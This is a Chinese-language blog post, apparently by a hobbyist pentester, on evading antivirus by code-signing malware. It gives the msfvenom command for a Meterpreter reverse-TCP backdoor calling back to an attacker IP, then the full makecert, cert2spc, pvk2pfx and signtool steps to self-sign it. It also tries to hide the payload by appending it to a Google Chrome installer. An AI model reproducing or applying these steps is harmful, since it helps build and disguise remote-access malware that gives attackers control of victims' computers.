利用证书签名绕过杀软

此文乃一般水文 ~ 师傅们轻喷

此文的起端是这样的，在做实验的时候，很多次双击执行文件时，都显示软件不安全或者软件并无签名无法校验什么鬼等操作…在我午休的时候死活睡不着，我就想着能不能给执行文件加个证书？顺便看看能绕过多少杀软？所以就有了以下文章

很多安装包都有签名，也可以说是为了防止他人恶意纂改倒不如说是为了让杀毒软件认为是安全的而不把你的马子干掉，当然一般自签名的人家也不认，需要付费买人家的根证书进行签名，好不容易自制个安装包让客户安装还被恶意毒杀，啊这…
（所以鄙人只能学习自制证书了，买不起买不起）

实验开始

先利用msf简单制作个反向的马子
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.101.129 LPORT=4444 -f exe > /home/zzzwj/tools/msf.exe
丢进win10，win defender：给爷si

自制签名

windows可使用自带的工具，安装了windows sdk 或者安装VS studio 使用vs 的命令行都可以：需要使用Visual Studio命令提示符在命令行上使用makecert实用程序。

你必须使用 Visual Studio command prompt 。在 Windows 10 上，此工具已重命名为 Developer Command Prompt for VS2015 。只需按Win键，然后搜索Developer Command Prompt即可找到此项

鄙人win10上先前安装过VS studio2019版的

创建自签名的证书和公钥
makecert -r -sv test_key.pvk -n "CN=test_test_test_hcak" test.cer

报错：Can't create the key of the subject ('xxxxxx-xxx-x-x-x-x‘)
解决方式：当前用户对文件目录的具有写入权限
生成发行者证书
cert2spc test.cer test.spc
生成PFX格式的证书
pvk2pfx -pvk test_key.pvk -pi [password] -spc test.spc -pfx test.pfx -po [password]
使用pfx格式的证书对可执行文件进行签名
signtool sign /f test.pfx /p [password] msf.exe

看看免杀程度…原来的是54/69，所以我说这算是水文吧~

签名完成之后，查看执行性文件的属性即可看到签名的信息

信誉好的软件包签名

这里使用Google软件包签名，绕过杀软
copy /b GoogleChromeStandaloneEnterprise64.msi + msf.exe msf_2.exe

但是…win10与win7均执行不了，但是这位老哥可以，可能是软件包或马子的问题https://www.cnblogs.com/hack404/p/12801954.html

参考：
https://happysec.cn/index/view/273.html
https://www.cnblogs.com/hack404/p/12801954.html
https://blog.csdn.net/xinyulou/article/details/101536828

要有待学习啊真的真的~

GOT IT！

******************************************************
具体利用方式需根据具体实践场景~